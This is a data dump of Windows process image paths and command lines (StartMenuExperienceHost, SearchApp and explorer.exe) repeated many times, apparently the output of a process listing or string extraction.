"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
"C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
"C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
C:\Windows\explorer.exe
explorer.exe
C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
